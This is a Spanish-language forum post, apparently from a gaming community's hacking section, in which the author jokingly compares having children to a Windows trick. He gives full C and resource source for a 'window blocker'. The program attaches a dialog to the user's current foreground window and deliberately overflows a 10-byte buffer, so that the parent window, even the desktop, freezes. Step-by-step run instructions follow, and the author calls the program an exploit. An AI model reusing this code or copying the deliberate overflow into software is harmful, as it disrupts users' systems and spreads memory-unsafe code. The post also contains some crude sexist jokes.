Teniendo Hijos por DarkIker

¡Bienvenido!

Al registrarte con nosotros, podrás discutir, compartir y enviar mensajes privados a otros miembros de nuestra comunidad.

¡Regístrate ahora!

  • En aquellos lejanos días del 2007, CiMSP - Network! dio sus primeros pasos tras la despedida de la Comunidad y Hosting de ATOMIX - DATA CENTER (2003 ~ 2007), antes conocido como {IO} IMPERIuM ~ ONLine (1994 ~ 2003). Desde el principio, marcamos nuestra presencia con fuerza: un Staff dedicado, un generoso presupuesto y actualizaciones anuales que renovaban nuestro diseño, sitio y logo de manera inquebrantable. Con más de 80 Servidores de Juegos (con más 154mil Membre$ías PREMIUM durante el 2011), Eventos mensuales, Torneos físicos y en línea #cimsp paso a ingresar en el TOP 1 (Argentina), TOP 3 (América Latina) y TOP 7 (Mundial) de Comunidades de Counter-Strike en muy pocas semanas, y se mantuvo así por años.

    Oficialmente, en 2015, #cimsp dejó de recibir actualizaciones abruptamente. El cierre repentino del hosting que albergaba todos nuestros recursos (No fue Atomix), incluyendo Backups, y la pérdida de IP's numéricas con 8 años de antigüedad, representó un desafío. A pesar de la adversidad y sin el respaldo de un Staff o capital externo, logramos levantar nuestro propio Hosting en 2020, justo dos meses antes de la pandemia. Este acto de resiliencia provocó un pequeño resurgimiento de la Comunidad, pasando de 0 a 260,896 Players activos, una cifra que nos abrió las puertas para recibir nuevamente el respaldo financiero de nuestra agencia madre en 2024, incluso después de cerrar el 2023 con 76,158 usuarios. Esto se debe a que lograron comprender que con recursos limitados, nosotros, el equipo de #cimsp, hemos logrado mucho. Ahora, imaginen lo que podríamos alcanzar con una inversión que nos garantice un futuro estable.

    Hoy, nos emociona anunciar que no estamos solos en este nuevo capítulo y que seremos parte de la dirección de un conglomerado de Comunidades especializadas en diferentes juegos, siempre respaldados y apoyados por PREL - Agency. Este 2024 promete ser un año lleno de crecimiento y oportunidades para todos nosotros. Y No se trata solo de abrir más Servidores (aunque los habrá), esta vez decidimos multiplicar la apuesta x1000. Así que únete a la evolución de #cimsp y sé parte de esta emocionante etapa junto a nosotros!


DiCHANHO

Administrator
Miembro del equipo
Registrado
20 Feb 2001
Mensajes
16.549
Introduccion

Quien no quiere tener un hijo?. Yo la verdad si quiero tener un hijo y poderle enseñar lo poco que se para que algun dia sea mejor que yo. Pero en realidad hay un mito entorno a que los Hackers tengan hijos; cuando han visto a un verdadero Hacker con hijos ; Personalmente no e visto al primero no se ustedes; creo que por su condicion Hacker y su increible intelecto los Hackers saben que un hijo no es un buen negocio. Las razones son muchas y hasta aumentan segun el sexo(las hijas son mas caras). Como primera medida gastas dinero, tiempo y tienes que limpiarle el trasero (a duras penas puedes limpiarte el tuyo). Y que recibes a cambio despues de 1 año de ardua tarea, solo un "Papa" y eso por que algunos reciben un "Dada". Luego cuando crecen la cosa se complica ya que si es una mujer, vos en tu calidad de hombre sabes que los hombres buscamos ciertas cosas en las mujeres ;), por lo mismo vos no quieres que nadie se le acerque a tu hija. En el caso de los varones la cosa es mas tranquila pues sabes que lo peor que puede pasar es que caiga tan bajo que se vuelva Hacker . Pero ya estaran diciendo ustedes y esto que tiene que ver con programacion o Hack?, pues tiene mucho que ver, primero que los hijos con perjudiciales para la salud humana, pero mucho mas para la salud de Windows(que no es perjudicial para el menda). Recientemente jugando con el ventanucos me di cuenta de algo, de una teoria que yo tenia y que confirme. Me decidi a crearme un programa en modo ventana basado en un cuadro de dialogo(osease que no creo una ventana si no un cuadro de dialogo) en el que se pudiera causar un overflow facilmente(nada especial), asi pues lo hice, ya cuando tuve el programa decidi que lo crearia como hijo del manejador de ventana que me devuelve la funcion "GetForegroundWindow"(osea la ventana en la que se esta trabajando), asi lo hice y luego cause el overflow y echo, habia bloqueado la ventana Padre , la razon es que cuando la ventana es destruida debe realizar ciertos procedimientos para avisar a su padre del acontecimiento y asi mismo devolverle el control a este, ya que este se encuentra inactivo cuando una ventana con atributo WS_CHILD o WS_OVERLAPPED es creada y debe esperar a su finalizacion para retomar el control, el echo es que cuando el overflow ocurre la ventana no es destruida y el proceso termina sin liberar sus recursos , por ende la ventana padre seguira inactiva hasta que la ventana hija retorne, cosa que nunca pasara por supuesto . La razon mas poderosa para que esto pase es que Windows permite utilizar los manejadores de otras ventanas distintas a la del mismo proceso, lo que nos da la posibilidad de utilizarla desde otros procesos y por ende poder aprovecharnos maliciosamente de ello(como en este caso). Este metodo es capaz de bloquear inclusive el Desktop ;) y cuanta ventana se nos ocurra. Acontinuacion pongo el code del programa que bloquea las ventanas.

Bloquer.c
Código:
// Bloqueador de ventanas 
// Codigo por DarkIker       
// [email protected]     

#include <windows.h>
#include <stdio.h>
#include "nano.h"

static BOOL CALLBACK DialogFunc(HWND hwndDlg, UINT msg, 

WPARAM wParam, LPARAM lParam);

int APIENTRY WinMain(HINSTANCE hinst, HINSTANCE hinstPrev, 

LPSTR lpCmdLine, int nCmdShow)
{
      HWND hola=GetForegroundWindow();
      return DialogBox(hinst, 

MAKEINTRESOURCE(IDD_MAINDIALOG), hola, (DLGPROC) DialogFunc);
}

static BOOL CALLBACK DialogFunc(HWND hDlg, UINT msg, WPARAM 

wParam, LPARAM lParam)
{
      char pepa[10],hola[50];
      int ab;

      switch (msg)
      {
            case WM_INITDIALOG:
                  break;
            case WM_COMMAND:
                  switch (LOWORD(wParam))
                  {
                        case IDOK:
                              

GetDlgItemText(hDlg,ID_TEXTO,pepa,50);
                              break;
                  }
                  break;
            case WM_CLOSE:
                  EndDialog(hDlg,0);
                  break;
      }
      return FALSE;
}

Bloquer.rc
Código:
/* Archivo de recursos */
#include <windows.h>
#include "nano.h"


IDD_MAINDIALOG DIALOG 77, 36, 177, 51
STYLE WS_POPUP | WS_CHILD | WS_VISIBLE | WS_CAPTION | 

WS_SYSMENU
CAPTION "Titulo"
FONT 8, "MS Sans Serif"
BEGIN
    EDITTEXT        ID_TEXTO, 11, 9, 155, 12
    PUSHBUTTON      "Overflow", IDOK, 69, 25, 40, 14
END

Bloquer.h
Código:
/* Archivo de cabecera */
#define      IDD_MAINDIALOG      100
#define ID_TEXTO      101


Ahora compilan el programa y lo corren, luego introducen unos 20 o 30 caracteres en el campo de edicion y le dan click al boton que dice "Overflow", y listo tendran un hermoso bloquer de ventanas para el menda Windows ;).

Creo que puede ser clasificado como un exploit , joder ya voy por el segundo. Aprovecho para agradecerle en orden de aparicion a ANtrAX, Sanctus, BlankDemon y AzRaEl que son por decirlo asi mis mentores y seguramente sin ellos no estaria aqui si no seguramente chateando en el latinchat en busca de sezo facil .

Att: [glow=red,2,300]DarkIker[/glow]
 
Respuesta: Teniendo Hijos por DarkIker

JAJAJAJAJA muy bueno ray (Y)
 
Atrás
Arriba